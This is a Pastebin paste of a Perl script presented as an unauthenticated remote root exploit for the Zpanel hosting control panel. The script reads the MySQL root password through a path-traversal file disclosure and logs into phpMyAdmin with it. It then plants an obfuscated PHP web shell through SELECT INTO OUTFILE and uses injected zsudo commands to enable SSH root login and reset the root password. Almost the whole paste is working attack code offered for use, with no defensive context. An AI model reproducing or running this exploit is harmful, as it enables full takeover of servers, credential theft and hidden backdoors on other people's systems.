API tools faq
paste
blogfakessh

#localrootzpanel

blogfakessh
Mar 9th, 2016
119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 6.04 KB | None | 0 0
raw download clone embed print report diff
  1. #!/usr/bin/perl
  2. #********************************************************************************
  3. #
  4. #
  5. #                Unauthenticated Zpanel Remote Root Exploit
  6. #                            japp@0xlabs.com
  7. #                         http://www.0xlabs.com
  8. #
  9. #
  10. #********************************************************************************
  11.  
  12.  
  13. use LWP::UserAgent;
  14.  
  15. $FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";
  16. $PMA_PATH        = "etc/apps/phpmyadmin/index.php";
  17. $PMA_DOCROOT     = "etc/apps/phpmyadmin/import.php";
  18.  
  19. print "\n\n";
  20. print "\t================================\n";
  21. print "\t[  Zpanel Remote Root Exploit  ]\n";
  22. print "\t[     By japp\@0xlabs.com       ]\n";
  23. print "\t[       www.0xlabs.com         ]\n";
  24. print "\t================================\n\n";
  25.  
  26.  
  27. my $argc = @ARGV;
  28.  
  29. if ( $argc != 1 )
  30. {
  31.         print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";
  32.         exit 1;
  33. }
  34.  
  35. my $ua = http_handler();
  36. my $url = $ARGV[0];
  37.  
  38. if ( $url !~ /^http/ ){ $url = "http://".$url; }
  39. if ( $url !~ /\/$/ )  { $url .= "/"; }
  40.  
  41. print " [*] Trying to get MySQL root password...\n";
  42. my $root_pass = GetPasswd ($url, $ua);
  43. print " [+] Mysql root password: ".$root_pass."\n";
  44.  
  45. print " [*] Trying to access through phpMyAdmin...\n";
  46. my $token = AccessPma ($root_pass, $url, $ua);
  47. print " [+] Login successfully\n";
  48.  
  49. print " [*] Getting Zpanel document root...\n";
  50. my $docroot = GetDocRoot ($token, $url, $ua);
  51. print " [+] Zpanel document root: ".$docroot."\n";
  52.  
  53. print " [*] Uploading shell...\n";
  54. UploadShell ($token, $docroot, $url, $ua);
  55. print " [+] Shell uploaded successfully!\n";
  56.  
  57. print " [+] Enabling SSH root login\n";
  58. EnableRoot ($url, $ua);
  59.  
  60. print " [*] Changing root password...\n";
  61. ChangePasswd ($url, $ua);
  62.  
  63. print " [+] Root password changed\n\n";
  64. print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";
  65.  
  66. sub ChangePasswd
  67. {
  68.         my $url     = $_[0];
  69.         my $ua      = $_[1];
  70.  
  71.         my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");
  72. }
  73.  
  74. sub EnableRoot
  75. {
  76.         my $url     = $_[0];
  77.         my $ua      = $_[1];
  78.  
  79.         my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");
  80.  
  81. }
  82.  
  83. sub UploadShell
  84. {
  85.         my $token   = $_[0];
  86.         my $docroot = $_[1];
  87.         my $url     = $_[2];
  88.         my $ua      = $_[3];
  89.  
  90.         my %pdata;
  91.  
  92.         $pdata{"token"}         = $token;
  93.         $pdata{"sql_query"}     = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'";
  94.         $pdata{"ajax_request"}  = "true";
  95.  
  96.         http_post ($url.$PMA_DOCROOT, $ua, %pdata);
  97.  
  98.         my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");
  99.  
  100.         if (!$rsp->is_success)
  101.         {
  102.                 die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");
  103.         }
  104.         my $cont = $rsp->content;
  105.  
  106.         if ( $cont !~ /0xlabs_rulz/ )
  107.         {
  108.                 die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");
  109.         }
  110. }
  111.  
  112. sub GetDocRoot
  113. {
  114.         my $token   = $_[0];
  115.         my $url     = $_[1];
  116.         my $ua      = $_[2];
  117.  
  118.         my %pdata;
  119.  
  120.         $pdata{"token"}         = $token;
  121.         $pdata{"sql_query"}     = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'";
  122.         $pdata{"ajax_request"}  = "true";
  123.  
  124.         my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);
  125.  
  126.         $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/;
  127.  
  128.         return $1;
  129. }
  130.  
  131. sub AccessPma
  132. {
  133.         my $root_pass   = $_[0];
  134.         my $url         = $_[1];
  135.         my $ua          = $_[2];
  136.  
  137.         my %pdata;
  138.  
  139.         my $rsp = $ua->get ($url.$PMA_PATH);
  140.  
  141.         if (!$rsp->is_success) {
  142.                 die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");
  143.         }
  144.  
  145.         my $cont = $rsp->content;
  146.  
  147.         $cont =~ /name=\"token\" value=\"(.+)\"/;
  148.  
  149.         my $token = $1;
  150.  
  151.         $pdata{"pma_username"}          = "root";
  152.         $pdata{"pma_password"}          = $root_pass;
  153.         $pdata{"server"}                = "1";
  154.         $pdata{"lang"}                  = "en";
  155.         $pdata{"collation_connection"}  = "utf8_general_ci";
  156.         $pdata{"token"}                 = $token;
  157.  
  158.         $cont = http_post ($url.$PMA_PATH, $ua, %pdata);
  159.  
  160.         if ( $cont =~ /Cannot log in to the MySQL server/ )
  161.         {
  162.                 die (" [-] Cannot log in to phpMyAdmin\n");
  163.         }
  164.  
  165.         $cont =~ /\?token=(.+)\"/;
  166.  
  167.         return $1;
  168. }
  169.  
  170.  
  171.  
  172. sub GetPasswd
  173. {
  174.         my $url = $_[0];
  175.         my $ua  = $_[1];
  176.  
  177.  
  178.         my $rsp = $ua->get ($url.$FILE_DISCLOSURE);
  179.  
  180.         if (!$rsp->is_success) {
  181.                 die (" [-] Can't get '".$url."'. Check URL.\n");
  182.         }
  183.  
  184.         my $cont = $rsp->content;
  185.  
  186.         if ( $cont !~ /root/ )
  187.         {
  188.                 die (" [-] Can't get root password. Patched?\n");
  189.         }
  190.  
  191.         my $flag = 0;
  192.         while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g )
  193.         {
  194.                 $flag++;
  195.                 if ( $flag == 4 )
  196.                 {
  197.                         return $1;
  198.                 }
  199.         }
  200.  
  201.  }
  202.  
  203. sub http_post
  204. {
  205.                 my ($host, $ua, %data)  = @_;
  206.  
  207.                 my $rsp                 = $ua->post ($host, [%data]);
  208.  
  209.                 return ($rsp->content);
  210. }
  211.  
  212. sub http_handler
  213. {
  214.                 my $newhandler          = LWP::UserAgent->new() or return -1;
  215.  
  216.                 $newhandler->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");
  217.                 $newhandler->timeout(10);
  218.                 $newhandler->protocols_allowed(['http','https']);
  219.                 $newhandler->cookie_jar( {} );
  220.  
  221.                 push @{ $newhandler->requests_redirectable }, 'GET';
  222.                 push @{ $newhandler->requests_redirectable }, 'POST';
  223.  
  224.                 return $newhandler;
  225. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!